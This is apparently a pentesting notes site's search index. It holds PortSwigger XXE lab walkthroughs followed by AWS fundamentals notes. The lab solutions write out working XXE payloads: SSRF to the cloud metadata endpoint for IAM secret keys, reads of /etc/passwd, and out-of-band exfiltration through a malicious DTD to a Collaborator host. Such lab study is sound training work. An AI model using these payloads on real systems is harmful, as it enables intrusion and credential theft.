        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_1","title":"Solution","text":"

        Capture the \"Check stock\" request:

        Perform the data exfiltration by chaining XXE and SSRF. The response will display the next folder that needs to be added to the request:

        # Burpsuite solution\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE test [ <!ENTITY xxe SYSTEM \"http://169.254.169.254/\"> ]>`\n3. Replace the `productId` number with a reference to the external entity: `&xxe;`. The response should contain \"Invalid product ID:\" followed by the response from the metadata endpoint, which will initially be a folder name.\n4. Iteratively update the URL in the DTD to explore the API until you reach `/latest/meta-data/iam/security-credentials/admin`. This should return JSON containing the `SecretAccessKey`.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction","title":"Blind XXE with out-of-band interaction","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_2","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        You can detect the blind XXE vulnerability by triggering out-of-band interactions with an external domain.

        To solve the lab, use an external entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_2","title":"Solution","text":"
        # Burpsuite solution\n1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [ <!ENTITY xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> ]>`\n3. Replace the `productId` number with a reference to the external entity:\n\n    `&xxe;`\n4. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#blind-xxe-with-out-of-band-interaction-via-xml-parameter-entities","title":"Blind XXE with out-of-band interaction via XML parameter entities","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_3","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

        To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#note","title":"Note","text":"

        To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_3","title":"Solution","text":"
        1. Visit a product page, click \"Check stock\" and intercept the resulting POST request in [Burp Suite Professional](https://portswigger.net/burp/pro).\n2. Insert the following external entity definition in between the XML declaration and the `stockCheck` element. Right-click and select \"Insert Collaborator payload\" to insert a Burp Collaborator subdomain where indicated:\n\n    `<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM \"http://BURP-COLLABORATOR-SUBDOMAIN\"> %xxe; ]>`\n3. Go to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-exfiltrate-data-using-a-malicious-external-dtd","title":"Exploiting blind XXE to exfiltrate data using a malicious external DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_4","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, exfiltrate the contents of the /etc/hostname file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_4","title":"Solution","text":"
        # Burpsuite solution\n1. Using [Burp Suite Professional](https://portswigger.net/burp/pro), go to the [Collaborator](https://portswigger.net/burp/documentation/desktop/tools/collaborator) tab.\n2. Click \"Copy to clipboard\" to copy a unique Burp Collaborator payload to your clipboard.\n3. Place the Burp Collaborator payload into a malicious DTD file:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/hostname\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>\"> %eval; %exfil;`\n4. Click \"Go to exploit server\" and save the malicious DTD file on your server. Click \"View exploit\" and take a note of the URL.\n5. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n6. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n7. Go back to the Collaborator tab, and click \"Poll now\". If you don't see any interactions listed, wait a few seconds and try again.\n8. You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload. The HTTP interaction could contain the contents of the `/etc/hostname` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-blind-xxe-to-retrieve-data-via-error-messages","title":"Exploiting blind XXE to retrieve data via error messages","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_5","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, use an external DTD to trigger an error message that displays the contents of the /etc/passwd file.

        The lab contains a link to an exploit server on a different domain where you can host your malicious DTD.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_5","title":"Solution","text":"
        # Burpsuite solution\n\n1. Click \"Go to exploit server\" and save the following malicious DTD file on your server:\n\n    `<!ENTITY % file SYSTEM \"file:///etc/passwd\"> <!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>\"> %eval; %exfil;`\n\n    When imported, this page will read the contents of `/etc/passwd` into the `file` entity, and then try to use that entity in a file path.\n\n2. Click \"View exploit\" and take a note of the URL for your malicious DTD.\n3. You need to exploit the stock checker feature by adding a parameter entity referring to the malicious DTD. First, visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n4. Insert the following external entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"YOUR-DTD-URL\"> %xxe;]>`\n\n    You should see an error message containing the contents of the `/etc/passwd` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xinclude-to-retrieve-files","title":"Exploiting XInclude to retrieve files","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_6","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that embeds the user input inside a server-side XML document that is subsequently parsed.

        Because you don't control the entire XML document you can't define a DTD to launch a classic XXE attack.

        To solve the lab, inject an XInclude statement to retrieve the contents of the /etc/passwd file.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_6","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Set the value of the `productId` parameter to:\n\n    `<foo xmlns:xi=\"http://www.w3.org/2001/XInclude\"><xi:include parse=\"text\" href=\"file:///etc/passwd\"/></foo>`\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-via-image-file-upload","title":"Exploiting XXE via image file upload","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_7","title":"Enunciation","text":"

        This lab lets users attach avatars to comments and uses the Apache Batik library to process avatar image files.

        To solve the lab, upload an image that displays the contents of the /etc/hostname file after processing. Then use the \"Submit solution\" button to submit the value of the server hostname.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_7","title":"Solution","text":"

        Afterwards, retrieve the avatar image:

        # Burpsuite solution\n\n- Create a local SVG image with the following content:\n\n    `<?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>`\n- Post a comment on a blog post, and upload this image as an avatar.\n- When you view your comment, you should see the contents of the `/etc/hostname` file in your image. Use the \"Submit solution\" button to submit the value of the server hostname.\n

        Payload:

        <?xml version=\"1.0\" standalone=\"yes\"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM \"file:///etc/hostname\" > ]><svg width=\"128px\" height=\"128px\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" version=\"1.1\"><text font-size=\"16\" x=\"0\" y=\"16\">&xxe;</text></svg>\n
        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#exploiting-xxe-to-retrieve-data-by-repurposing-a-local-dtd","title":"Exploiting XXE to retrieve data by repurposing a local DTD","text":"","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#enunciation_8","title":"Enunciation","text":"

        This lab has a \"Check stock\" feature that parses XML input but does not display the result.

        To solve the lab, trigger an error message containing the contents of the /etc/passwd file.

        You'll need to reference an existing DTD file on the server and redefine an entity from it.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#hint","title":"Hint","text":"

        Systems using the GNOME desktop environment often have a DTD at /usr/share/yelp/dtd/docbookx.dtd containing an entity called ISOamso.

        ","tags":["burpsuite","jwt"]},{"location":"burpsuite/burpsuite-xxe/#solution_8","title":"Solution","text":"
        # Burpsuite solution\n\n1. Visit a product page, click \"Check stock\", and intercept the resulting POST request in Burp Suite.\n2. Insert the following parameter entity definition in between the XML declaration and the `stockCheck` element:\n\n    `<!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM \"file:///usr/share/yelp/dtd/docbookx.dtd\"> <!ENTITY % ISOamso ' <!ENTITY &#x25; file SYSTEM \"file:///etc/passwd\"> <!ENTITY &#x25; eval \"<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>\"> &#x25;eval; &#x25;error; '> %local_dtd; ]>` This will import the Yelp DTD, then redefine the `ISOamso` entity, triggering an error message containing the contents of the `/etc/passwd` file.\n
        ","tags":["burpsuite","jwt"]},{"location":"cloud/","title":"Pentesting cloud","text":"","tags":["cloud pentesting"]},{"location":"cloud/#basics-about-cloud","title":"Basics about cloud","text":"

        There are many \"clouds\", but these three cloud providers are the big players in the market:

        • Azure: Fundamentals | Security Engineer Level.
        • Amazon Web Service (AWS): AWS essentials
        • Google Cloud: GCP essentials
        ","tags":["cloud pentesting"]},{"location":"cloud/#cloud-services-matrix","title":"Cloud services matrix","text":"Azure AWS GCP Available Regions Azure Regions AWS Regions and Zones Google Compute Regions & Zones Compute Services Virtual Machines Elastic Compute Cloud (EC2) Compute Engine App Hosting Azure App Service Amazon Elastic Beanstalk Google App Engine Serverless Computing Azure Functions AWS Lambda Google Cloud Functions Container Support Azure Container Service EC2 Container Service Google Computer Engine (GCE) Scaling Options Azure Autoscale Auto Scaling Autoscaler Object Storage Azure Blob Storage Amazon Simple Storage (S3) Google Cloud Storage Block Storage Azure Disks Amazon Elastic Block Store Persistent Disk Content Delivery Network (CDN) Azure CDN Amazon CloudFront Cloud CDN SQL Database Options Azure SQL Database Amazon RDS Google Cloud SQL NoSQL Database Options Azure CosmosDB AWS DynamoDB Google Cloud Bigtable Virtual Network Azure Virtual Network Amazon VPC Cloud Virtual Network Private Connectivity Azure ExpressRoute AWS Direct Connect Cloud Interconnect DNS Services Azure DNS Amazon Route S3 Cloud DNS Log Monitoring Azure Log Analytics Amazon CloudTrail Cloud Logging Performance Monitoring Azure Application Insights Amazon CloudWatch Stackdriver Monitoring Administration and Security Azure Entra ID AWS Identity and Access Management Cloud Identity and Access Management Compliance Azure Trust Center AWS CloudHSM Google Cloud Platform Security Analytics Azure Monitor Amazon Kinesis Cloud Dataflow Automation Azure Automation AWS Opsworks Compute Engine Management Management Services & Options Azure Resource Manager Amazon Cloudformation Cloud Deployment Manager Notifications Azure Notification Hub Amazon Simple Notification Service (SNS) None Load Balancing Load Balancing for Azure Elastic Load Balancing Load Balancer","tags":["cloud pentesting"]},{"location":"cloud/#pentesting-cloud_1","title":"Pentesting cloud","text":"
        • Pentesting Azure.
        • Pentesting AWS.
        • Pentesting docker.
        ","tags":["cloud pentesting"]},{"location":"cloud/apache-cloudstack/apache-cloudstack-essentials/","title":"Apache CloudStack Essentials","text":"

        Apache CloudStack is open source software designed to deploy and manage large networks of virtual machines, as a highly available, highly scalable Infrastructure as a Service (IaaS) cloud computing platform.

        CloudStack is a turnkey solution that includes the entire stack of features most organizations want in an IaaS cloud.

        It covers compute orchestration, Network-as-a-Service, user and account management, a full and open native API, resource accounting, and a first-class user interface (UI). CloudStack currently supports the most popular hypervisors: VMware, KVM, Citrix XenServer, Xen Cloud Platform, Oracle VM Server and Microsoft Hyper-V.

        Users can manage their cloud with an easy-to-use web interface, command-line tools, and/or a full-featured RESTful API.

        In addition, CloudStack provides an API that is compatible with the Amazon Web Services EC2 and S3 APIs.

        • Useful for organizations that wish to deploy hybrid clouds.
        • Similar to the OpenStack dashboard, the CloudStack dashboard lets you manage all your resources.

        Link to installation: https://docs.cloudstack.apache.org/en/4.18.0.0/installguide/overview/index.html

        ","tags":["cloud","apache cloudstack","open source"]},{"location":"cloud/aws/aws-essentials/","title":"Amazon Web Services (AWS) Essentials","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-compute","title":"AWS Compute","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-computer-cloud-ec2","title":"Elastic Computer Cloud (EC2)","text":"

        An EC2 instance is a Virtual Server running on AWS. You deploy your EC2 instances into a virtual private cloud or VPC. You can deploy them into public or private subnets.

        You can choose: OS, CPU, RAM, storage space, network card, firewall rules (security group), and a bootstrap script (run at first launch, known as EC2 User Data). Bootstrapping means launching commands when a machine starts; the script runs only once, at first start. You can use it to install updates, install software, download common files from the internet, ...

        Public subnets have a public IP address and can be accessed from the Internet. Private subnets are isolated: they can only communicate with each other within the VPC (unless you install a gateway).

        Some instance types: t2.micro, t2.xlarge, c5d.4xlarge, r5.16xlarge, m5.8xlarge,... t2.micro is part of the AWS free tier with up to 750 hours per month. This is the naming convention for instances:

        m5.2xlarge\n# m: instance class\n# 5: generation of the instance \n# 2xlarge: size within the instance class\n

        There are general purpose instances, storage optimized, network optimized, or memory optimized, for instance.

        Security groups only have allow rules (the default is deny). By default, all inbound traffic is blocked and all outbound traffic is authorized. An instance can have multiple security groups attached, and rules can reference other security groups. Adding a rule from the AWS CLI is sketched below.
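
        A minimal sketch, assuming a placeholder group ID:

        # Hedged sketch: allow inbound SSH on a security group (the group ID is a placeholder)\naws ec2 authorize-security-group-ingress --group-id sg-0123456789abcdef0 --protocol tcp --port 22 --cidr 0.0.0.0/0\n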

        The default user for connecting to EC2 via SSH is ec2-user, so the SSH connection would be:

        ssh -i access-key.pem ec2-user@<IP>\n
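
        Note that ssh refuses private keys with permissive file modes, so restrict the key's permissions first:

        chmod 400 access-key.pem\n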
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ami","title":"AMI","text":"

        AMI stands for Amazon Machine Image; an AMI represents a customization of an EC2 instance. It's similar to the concept of an OVA in VirtualBox.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-image-builder","title":"EC2 Image Builder","text":"

        EC2 Image Builder is used to automate the creation of VM or container images. It automates the creation, maintenance, validation, and testing of EC2 AMIs. It can be run on a schedule. It's a free service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-storage","title":"AWS Storage","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-block-store-ebs","title":"Amazon Elastic Block Store (EBS)","text":"

        A block storage device is a virtual hard drive in the cloud. The OS reads/writes at the block level. Disks can be internal or network-attached. The OS sees volumes that can be partitioned and formatted. Use cases:

        • Use by Amazon EC2 instances.
        • Relational and non-relational databases.
        • Enterprises applications.
        • Containerized applications.
        • Big data analytics.
        • File systems.

        The free tier has 30GB of free EBS storage of type General Purpose (SSD) or Magnetic per month.

        EBS volumes are network drives, not physical drives: they use the network to communicate with the instance. They can be detached from an EC2 instance and attached to another very quickly, but they are locked to an Availability Zone.

        They don't need to be attached to any instance. They also have a delete-on-termination attribute, which is disabled by default for non-root volumes; this setting can be changed from the AWS CLI, as sketched below.
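
        A minimal sketch of toggling that attribute (instance ID and device name are placeholders):

        # Hedged sketch: change DeleteOnTermination for an attached volume (IDs and device name are placeholders)\naws ec2 modify-instance-attribute --instance-id i-0123456789abcdef0 --block-device-mappings '[{\"DeviceName\":\"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\":false}}]'\n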

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ebs-snapshots","title":"EBS Snapshots","text":"

        It takes a backup (snapshot) of your EBS volume at a point in time. It is not necessary to detach the volume to take a snapshot, but it is recommended. Snapshots are useful to replicate EBS volumes across regions: by copying a snapshot to a different region, you can migrate an EBS volume there.

        There is an EBS Snapshot Archive tier that lets you move a snapshot to archive storage that is 75% cheaper.

        There is also a Recycle Bin service that lets you retain deleted snapshots; you can define the retention policy for it.
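
        A minimal CLI sketch of the snapshot-and-copy workflow (volume/snapshot IDs and regions are placeholders):

        # Hedged sketch: snapshot a volume, then copy the snapshot to another region (IDs are placeholders)\naws ec2 create-snapshot --volume-id vol-0123456789abcdef0 --description 'pre-migration backup'\n# copy-snapshot runs in the destination region and pulls from the source region\naws ec2 copy-snapshot --region eu-west-1 --source-region us-east-1 --source-snapshot-id snap-0123456789abcdef0\n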

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#ec2-instance-store","title":"EC2 Instance Store","text":"

        EBS volumes are network drives with good but limited performance. If you need a high-performance hardware disk, you have EC2 Instance Store.

        EC2 Instance Store is good for buffer / cache / scratch data and temporary content, but not for long-term storage.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-file-system-efs","title":"Amazon Elastic File System (EFS)","text":"

        It uses File Storage, in which a filesystem is mounted to the OS using a network share. A filesystem can be shared by many users. Use cases:

        • Corporate home directories.
        • Corporate shared directories.
        • Big data analytics.
        • Lift & Shift enterprise applications.
        • Web serving.
        • Content management.

        EFS works only with Linux EC2 instances in multi-AZ.

        EFS Infrequent Access (EFS-IA) is a storage class cost-optimized for files that you don't access very often. It saves up to 92% of cost compared to EFS Standard. You can have EFS-IA integrated with a Lifecycle policy.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-fsx","title":"Amazon FSx","text":"

        Amazon FSx is a managed service to get third party high-performance file system on AWS.

        It's fully managed. There are 3 services:

        • FSx for Lustre: High-Performance Computing. For machine learning, analytics, video processing, financial modelling...
        • FSx for Windows File Server: supports SMB and NTFS. Built on Windows File Server and integrated with Windows Active Directory.
        • FSx for NetApp ONTAP.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-simple-storage-services-s3","title":"Amazon Simple Storage Services (S3)","text":"

        It uses object storage containers (buckets); there is no hierarchy of objects in the container. It's used for backup and storage, along with disaster recovery, archiving, media hosting, hybrid cloud storage... It exposes a REST API. Use cases:

        • Websites.
        • Mobile applications.
        • Backup and archiving.
        • IoT devices.
        • Big data analytics.

        As benefits, it offers very low-cost object storage, high durability, and multiple storage classes.

        In S3 you have buckets. A bucket is a container into which you put your objects. The objects inside your bucket can be public or private to the Internet. Buckets must have a globally unique name and are defined at the region level.

        A key is the full path to the file, e.g. s3://my-bucket/my-folder/my-file.txt. It is composed of a prefix and an object name. Max object size is 5 TB (5,000 GB).
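
        A few basic aws-cli operations illustrating buckets, prefixes and keys; a minimal sketch with placeholder names:

        # Hedged sketch: create a bucket, upload an object under a prefix, list the prefix (names are placeholders)\naws s3 mb s3://my-example-bucket\naws s3 cp my-file.txt s3://my-example-bucket/my-folder/my-file.txt\naws s3 ls s3://my-example-bucket/my-folder/\n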

        There are S3 Bucket Policies to allow public access, and there are also IAM permissions that you can assign to users. You can also use an EC2 Instance Role to grant access to EC2 instances. Additionally, in the bucket settings you can block public access (this can also be set at the account level).

        Cool tool: Amazon policy generator

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#creating-a-static-website","title":"Creating a static website","text":"

        After enabling static website hosting on a bucket, this would be the URL: http://bucketname.s3-website-aws-region.amazonaws.com
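
        Static website hosting can be enabled on a bucket from the CLI; a minimal sketch (bucket and document names are placeholders):

        # Hedged sketch: enable static website hosting on a bucket (names are placeholders)\naws s3 website s3://my-example-bucket/ --index-document index.html --error-document error.html\n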

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#storage-classes","title":"Storage classes","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-network","title":"Amazon Network","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-load-balancing-elb","title":"Amazon Elastic Load Balancing (ELB)","text":"

        A load balancer is a server that forwards internet traffic to multiple servers downstream; these are typically EC2 instances, also called the backend EC2 instances.

        Elastic load balancing is something that is managed by AWS.

        Benefits:

        • ELB can spread the load across multiple downstream instances.
        • ELB allows you to expose a single point of access, DNS host name, for your application.
        • ELB can seamlessly handle the failures of downstream instances.
        • ELB can do regular health checks on the instances; if one of them is failing, the load balancer will not direct traffic to that instance.
        • It provides SSL termination (HTTPS) for your websites.

        There are 4 kinds:

        • Application Load Balancer (HTTP/HTTPS only) - Layer 7
        • Network Load Balancer (ultra high performance, allows for TCP) - Layer 4
        • Gateway Load Balancer - Layer 3
        • Classic Load Balancer (retired in 2023) - Layers 4 and 7

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#auto-scaling-groups-asg","title":"Auto Scaling Groups (ASG)","text":"

        The goal of an Auto Scaling Group is to scale out (add EC2 instances to match an increased load) or scale in (remove EC2 instances to match a decreased load). With this we can ensure that we have a minimum and a maximum number of machines running at any point in time, and once the Auto Scaling Group creates or removes EC2 instances, we can make sure these instances are registered or deregistered with our load balancer.

        You can define a minimum size, a maximum size, and a desired capacity.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-migration-tools","title":"Amazon migration tools","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-snow","title":"AWS Snow","text":"
        • Snowball Edge Storage Optimized & Snowball Edge Compute Optimized
        • AWS Snowcone & Snowcone SSD
        • AWS Snowmobile (the truck). 100 PB of capacity.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#edge-computing","title":"Edge Computing","text":"

        Edge Computing is when you process data while it's being created at an edge location. You can use the Snow Family to run EC2 instances and Lambda functions to do this.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-opshub","title":"AWS OpsHub","text":"

        AWS OpsHub is software that you install on your computer or laptop, so it's not something you use on the cloud. Once connected, it gives you a graphical interface to connect to your Snow devices, configure them, and use them.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-databases","title":"AWS Databases","text":"

        AWS has an offer of managed databases. As benefits, AWS performs quick provisioning, high availability, vertical and horizontal scaling, automated backup and restore, operations, upgrades, patching, monitoring, alerting...

        You could always create an EC2 instance and install a database server yourself, but by using an AWS managed database you won't need to configure and maintain all the features listed above.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#relational-database-service-amazon-rds","title":"Relational Database Service (Amazon RDS)","text":"

        It's a relational database which uses SQL as a query language.

        • Postgres
        • MySQL
        • MariaDB
        • Oracle
        • Microsoft SQL Server
        • Aurora (AWS Proprietary Database).

        Note: You can NOT SSH into your RDS instance.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#rds-deployments-read-replicas-multi-az","title":"RDS Deployments: Read Replicas, Multi-AZ","text":"

        RDS Read Replica

        • A Read Replica is a copy of your database; creating one is a way to scale the read workload. Say you have an application that performs read operations on your database: if you need to scale that workload, you create Read Replicas, which are copies of your RDS database, so your applications can also read from them, distributing the reads across many RDS databases (a minimal CLI sketch follows this list).
        • You can create up to 15 Read Replicas.
        • Data is only written to the single central RDS database.
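
        A minimal CLI sketch of creating a Read Replica (both identifiers are placeholders):

        # Hedged sketch: create a Read Replica of an existing RDS instance (identifiers are placeholders)\naws rds create-db-instance-read-replica --db-instance-identifier mydb-replica --source-db-instance-identifier mydb\n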

        Multi-AZ

        • Used for failover in case of an AZ outage: if your RDS instance crashes, AWS fails over to a standby in a different Availability Zone.

        Multi-Region

        Same as Multi-AZ but for different regions. This is usually part of a disaster recovery strategy or a plan to reduce latency.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora","title":"Amazon Aurora","text":"
        • Aurora is a proprietary technology from AWS, not open source.
        • Aurora DB supports Postgres and MySQL.
        • Aurora is \"AWS Cloud optimized\" and claims 5x performance improvement over MySQL on RDS, over 3x the performance of Postgres on RDS.
        • Aurora storage automatically grows in increments of 10 GB, up to 128 TB.
        • Aurora costs more than RDS (20% more) but it's more efficient.
        • Not in the free tier.

        RDS and Aurora are going to be the two ways for you to create relational databases on AWS. They're both managed and Aurora is going to be more cloud-native, whereas RDS is going to be running the technologies you know, directly as a managed service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora-serverless","title":"Amazon Aurora Serverless","text":"

        Amazon Aurora Serverless is a serverless option for Amazon Aurora where database instantiation is automated.

        • Auto-scaling is provided based on actual usage of the database.
        • Postgres and MySQL are supported as engines of Aurora Serverless database.
        • No capacity planning needed.
        • No management needed.
        • Pay per second, most cost-effective.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elasticache","title":"Amazon ElastiCache","text":"
        • ElastiCache provides managed Redis or Memcached.
        • Caches are in-memory databases with high performance and low latency.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb","title":"DynamoDB","text":"
        • Fully managed, highly available, with replication across 3 AZs.
        • NoSQL database.
        • Scales to massive workloads, distributed serverless database.
        • Millions of requests per second: low latency.
        • Integrated with IAM for security, authorization and administration.
        • Low cost and auto-scaling capabilities.
        • Standard and Infrequent Access Table Class.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-accelerator-dax","title":"DynamoDB Accelerator (DAX)","text":"
        • Fully managed in-memory cache for DynamoDB (for the frequently read objects).
        • 10x performance improvement.
        • DAX is only used for and is integrated with DynamoDB, while ElastiCache can be used for other databases.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-global-tables","title":"DynamoDB Global Tables","text":"

        It makes a DynamoDB table accessible with low latency in multiple regions. It's a feature of DynamoDB.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#redshift","title":"Redshift","text":"
        • It's a database based on PostgreSQL, but it's not used for Online Transaction Processing (OLTP).
        • Redshift is Online Analytical Processing (OLAP), used for analytics and data warehousing.
        • Load data once every hour.
        • Columnar storage of data (instead of row-based).
        • Has a SQL interface for performing queries.
        • Massively Parallel Query Execution (MPP).
        • BI tools such as Amazon QuickSight or Tableau integrate with it.

        It has a feature for Serverless: Redshift Serverless.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-mapreduce-emr","title":"Amazon Elastic MapReduce (EMR)","text":"
        • EMR helps create Hadoop clusters (Big Data) to analyze and process vast amounts of data.
        • Also supports Apache Spark, HBase, Presto, Flink.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-athena","title":"Amazon Athena","text":"
        • Amazon Athena is a serverless query service to perform analytics against S3 objects.
        • It uses SQL language.
        • Supports CSV, JSON, ORC, Avro, and Parquet.
        • It uses columnar data.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quicksight","title":"Amazon QuickSight","text":"

        Amazon QuickSight is a serverless machine learning-powered business intelligence service to create interactive dashboards.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#documentdb","title":"DocumentDB","text":"
        • If Aurora is an AWS implementation of Postgres/MySQL, DocumentDB is the same for MongoDB (which is a NoSQL database).
        • MongoDB is used to store, query and index JSON.
        • Fully managed database, with replication across AZ.
        • Automatic scaling.
